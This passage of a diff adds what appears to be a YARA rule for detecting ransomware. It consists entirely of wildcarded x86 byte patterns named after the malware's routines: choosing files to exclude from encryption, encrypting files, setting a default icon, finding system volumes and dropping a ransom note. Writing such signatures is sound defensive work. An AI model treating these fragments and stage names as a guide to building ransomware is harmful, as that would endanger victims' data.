+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
+        }
+		$exclude_from_encryption_v2_p1 = {
+            50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6
+        }
+		$exclude_from_encryption_v2_p2 = {
+            45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 84 C0 0F 44 CA 8D 45 ?? 50 E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ??
+            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
+        }
+		$encrypt_files_v5_p1 = {
+            50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D 45 ?? 50 56 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
+            8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C7 45 ?? ?? ?? ?? ?? 8D 4B ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B C2 ?? ?? 8B 7D ?? 83
+            C1 ?? 8B 35 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B 7D ??
+            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ??
+            E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ??
+            FF 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? FF 75 ?? 83
+        }
+		$encrypt_files_v5_p2 = {
+            C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C ?? 81 FF ?? ??
+            ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 66 0F 13 45
+            ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CF 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 50 51 E8 ??
+            ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 45 ?? F2 0F
+            11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 ?? ?? ?? ??
+            39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ??
+            8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 85
+            C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F 11 45 ?? 50
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D
+            ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 50 FF 75 ??
+            FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? ?? ?? 89 45
+            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 FF 75 ?? 57
+            6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 57
+            C0 66 0F 13 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B
+            7D ?? 89 45 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B CF 0F A4 C8 ?? 6A ?? C1 E1 ?? 03
+            4D ?? 6A ?? 13 45 ?? 50 51 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 8B 45 ??
+            13 45 ?? 89 45 ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 7D ?? 0F 82
+        }
+		$encrypt_files_v6_p1 = {
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 85 F6 0F 8F ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 03 48 ?? 8B 01 FF 50 ?? 83 7B ?? ?? 8D 43 ??
+            F2 0F 10 05 ?? ?? ?? ?? 0F 43 43 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 8D 45 ?? 50 57 FF 15
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C6 45 ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B
+            C2 ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B CF 76 ?? 8B FE 2B 7D ?? 66
+            8B 04 0F 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? 2B 75 ?? D1 FE E9 ?? ?? ?? ?? 8B 7D
+            ?? 83 C6 ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B
+            75 ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+        }
+		$encrypt_files_v6_p2 = {
+            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
+            6A ?? E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ??
+            ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ??
+            FF 75 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C
+        }
+		$encrypt_files_v6_p3 = {
+            81 FE ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0
+            66 0F 13 45 ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CE 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2
+            50 51 E8 ?? ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89
+            45 ?? F2 0F 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85
+            ?? ?? ?? ?? 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ??
+            ?? ?? ?? 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FE ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10
+            05 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F
+            11 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 C6 45
+            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52
+            50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ??
+            ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50
+            FF 75 ?? 56 6A ?? 6A ?? 57 C6 45 ?? ?? 8B 4D
+        }
+		$set_default_icon_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
+            89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? B0 ?? C7 45 ?? ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 98
+            66 31 44 4D ?? 41 83 F9 ?? 73 ?? 8A 45 ?? EB ?? 33 C0 56 66 89 45 ?? C6 45 ?? ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 C7 45
+            ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2
+        }
+		$set_default_icon_p2 = {
+            81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
+            51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ??
+            ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 6A ?? 66 89 45 ?? 8D 45 ?? 0F 43
+            45 ?? 6A ?? 6A ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 8D 4D
+            ?? 8B 45 ?? 0F 43 4D ?? 03 C0 50 51 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 6A
+            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 B8 ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 89 45
+            ?? C6 45 ?? ?? 8B 4D ?? 5E 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9
+            ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ??
+            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_system_volumes = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ??
+            ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? C7 06 ?? ?? ?? ??
+            C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 66 90
+            8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 D2 C7 45 ?? ?? ?? ?? ?? 66 89 55 ??
+            83 C4 ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 0C 00 C7 45 ?? ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 03 C1 C7 45 ?? ?? ?? ?? ?? 3B D0 74 ?? D1 F9 8B C2
+            51 50 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 46 ?? 3B 46 ?? 74 ??
+            6A ?? 51 50 C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 46 ?? ?? 66 89 45 ??
+            EB ?? 51 50 8B CE E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C
+            4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8
+            ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 66 89 45 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ??
+            57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C6 5F 5E 5B 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$drop_ransom_note_v2_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? 53
+            56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 8B D8 2B CF 83 C4 ?? 3B CB 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            8D 0C 3B C7 45 ?? ?? ?? ?? ?? 0F 43 45 ?? BE ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B CE 76 ?? 8B F1 83 CE ?? 81 FE
+            ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 3B F0 0F 42 F0 8D 46 ?? 50 8D
+            4D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 0C 3B 89 45 ?? 89 75 ?? 8D 34 3F 56 FF 75 ?? 89 4D
+            ?? 50 E8 ?? ?? ?? ?? 8B 7D ?? 8D 04 1B 50 68 ?? ?? ?? ?? 8D 0C 3E 51 E8 ?? ?? ?? ??
+            8B 45 ?? 33 C9 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 0C 47 C6 45 ?? ?? B8 ?? ?? ?? ??
+            83 3D ?? ?? ?? ?? ?? 8D 4D ?? FF 35 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8B F0 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 C4 ?? 66
+        }
+		$drop_ransom_note_v2_p2 = {
+            89 06 BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B
+            4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B
+            50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 66 89 45
+            ?? 8D 45 ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B F8 83 FF ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
+            ?? 57 FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B 4D ?? 5F 5E 5B 83 F9 ?? 72
+            ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B
+            C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D
+            ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files_v5 = {
+            50 FF 15 ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74
